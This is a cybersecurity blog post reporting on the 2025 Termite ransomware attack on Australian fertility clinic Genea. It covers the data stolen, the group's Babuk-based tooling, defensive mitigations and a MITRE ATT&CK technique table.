Genea Fertility Clinic Ransomware Attack (2025)

-


Genea Fertility Clinic

On 21st February 2025, Genea, which is one of the largest fertility clinics in Australia, claimed to have observed some suspicious activity in their network from 14th February. This clinic launched an active investigation for a non-disrupted service that has successfully operated for the last 40 years.

On Feb 26th, the investigation found the activity of threat actors that had begun to publish stolen data from the Genea Patient Management System.

The ransomware gang, Termite, claimed responsibility for the attack and claimed to have access to 700GB data of from the Genea Patient Management System. According to the investigation report the stolen data contains severely sensitive data, like,

Full names Emails, Addresses, Phone Numbers, Medicare Card Numbers, Private Health Insurance Details, Defense DA numbers, Medical Record Numbers, Patient Numbers, Date of Birth, Medical History, Diagnoses and Treatments, Medications and Prescriptions, Patient Health Questionnaire, Pathology and Diagnostic Test Results, Notes from Doctors and Specialists, Appointment Details and Schedules, Emergency Contacts and Next of Kin, although the information differs for different individuals.

On 26th Feb Genea was granted a restraining order against the threat actors by the Australian Supreme Court in New South Wales. A copy of the court order, which has redacted certain information, including the identity of the hacker and their dark web, stated that “defendants or any other person” are prohibited from publishing, communicating or disclosing any information or material obtained from the Genea dataset.

Termite Ransomware Gang

Termite Group's ransomware attack is making its name quite quickly. They also claimed responsibility for the November cyber-attack on Blue Yonder, a supply chain management solution company. Even they were linked to several zero-day attacks on Cleo File Transfer products.

This group is using a modified version of an older ransomware strain, Babuk. This strain was on the radar of law enforcement for quite a long. In 2003, the US Department of Justice indicated a Russian national for using various ransomware variants, including the modified Babuk, to target victims in multiple sectors such as law enforcement agencies in Washinton, D.C and New Jersey, as well as victims in healthcare and other sectors nationwide.

“Babuk encryptor was leaked in September 2021. The builder is basically just the source code so that anyone can compile the encryption tool and run their own ransomware campaign.”- Aaron Walton, Threat Intelligence Analyst.

Termite ransomware’s operational procedure demonstrates a combination of traditional ransomware techniques and some modernized tactics to optimize the disruptive potentiality and financial gain. The modus operandi of this group is similar to other ransomware attackers,

  • Encryption of Data
  • Exfiltrating sensitive information

This leads to a well-distributed and strategized strength of its own extortion efforts.

Termite ransomware has established a global presence quite quickly. Their major targeted victims are in the United States, Canada, France, Germany, Oman, and Cyprus. Its victims have various industries which demonstrate the ability to quickly adapt to different industrial environments and regions.


Mitigation and Precaution:

  1. Regular Patch Management: Updated software with the latest security patches ensures a safe and better environment as these updates address all the known vulnerabilities. Specifically, Cleo file transfer products with the vendor-recommended patches.
  2.  Advanced Threat Detection: EDR (Endpoint Detection and Response) solutions can monitor any suspicious activity in the network and can take proactive measures to eliminate any IoCs (Indications of Compromise). The capability of high integration power with other security tools like SIEM, SOAR, and NAC makes it more enhanced to ensure a secure infrastructure.
  3. Access Control: Strict access control planning can ensure any unwanted and unauthorized access over sensitive datasets of an organization which promptly supports the administration of any critical assets.
  4. Incident Response Plan: Implementation of an incident response plan will be a more effective solution against any suspicious activity in the networks. The preferable tools like a well-developed SIEM can ensure an efficient responsive and eliminating solution towards any type of unknown activity.
  5. Backup and Recovery plan: Keeping an offline data backup will recommend part from a cyber security expert. As in the case of Genea, the encrypted file was quite huge and it was quite sensitive towards their client. So, a recovery plan can enable the post-attack security measures.
  6. Email Security and Awareness: Email Security can defend the phishing attacks and it helps to restrict the initial access gain towards a potential target. Even awareness is required in the employees so that they cannot leave any vulnerable points unattended or mitigated. So, a weekly or monthly cyber awareness program can be more valuable in an organization.
  7. Network segmentation: Network segmentation can help to prevent and privilege escalation techniques. It can secure various departments in a small structure. In the Genea Incident, it was found the dataset of payment was not available on the dark web. So, network segmentation played a role in this incident. But the management was compromised. Hence, it is quite clear why network segmentation is being recommended by cyber experts.

According to Mitre Att&CK framework, termite ransomware’s tactics, techniques, and procedure (TTPs) are:


Tactic

Technique ID

Technique Name

Execution

T1204.002

User Execution

Defense Evasion

T1070.004

Indicator Removal on Host

Discovery

T1083

File and Directory Discovery

Lateral Movement

T1021

Remote Services

Privilege Escalation

T1078

Valid Accounts

Discovery

T1135

Network Share Discovery

Command and Control

T1105

Ingress Tool Transfer

Impact

T1486

Data Encrypted for Impact

Impact

T1490

Inhibit System Recovery

This can help to understand how the threat actors are operating. The above table offers valuable insight for cyber teams to strengthen their defense and monitoring systems. If you can find these TTPs in the existing SoC system, make sure you have a good plan to safeguard your organizational infrastructure.

                                                                                                            


Comments

Post a Comment

Popular posts from this blog

How to Develop an Effective RCA Report for Incident Response

-
Image
How to Develop an Effective RCA Report for Incident Response Our fast-paced world is dependent on technology and the internet. That’s why, today, cyber security breaches are a rigorous headache for business owners- incidents can occur anytime- from phishing attacks to malware infections or unauthorised access in any infrastructure, even in the self-satisfactory declaration “Impenetrable networks”. As a SOC analyst, I am authorised to monitor any fluctuation in the SIEM dashboard and take immediate action if required. Apart from that, while I am responding to the incident, I need to understand why it happened and  prevent the event from escalating to other highly sensitive data zones. That is the place where an efficient and well-verified Root Cause Analysis report comes in. In this blog, I will walk you through what an RCA report is, why it is essential for incident response, and provide a generic procedure to create a professional RCA report. As a leading SOC analyst, ...
Read more

POV: “I am secured, I have a Licensed Antivirus!” - Are you protected from cybercriminal minds?

-
In today’s rapidly evolving digital landscape, many people and organizations still rely on traditional antivirus software to protect their systems. But are these solutions enough to tackle the sophisticated threats we face today? The short answer: probably not. With the rise of advanced malware, zero-day exploits, and sophisticated attack techniques, depending upon traditional antivirus software alone may leave your system vulnerable.  Let’s examine how traditional antivirus compares to Next-Generation Endpoint Detection and Response (EDR) and why EDR is becoming a critical tool for modern cybersecurity.  Traditional Antivirus: A Basic Shield   Antivirus software has been the backbone of computer security for decades. It typically works by scanning files and programs against a signature database of known threats. If it finds a match, it only quarantines or deletes the malicious file. However, this approach has its limitations:  Signature-Based Detection : Tradi...
Read more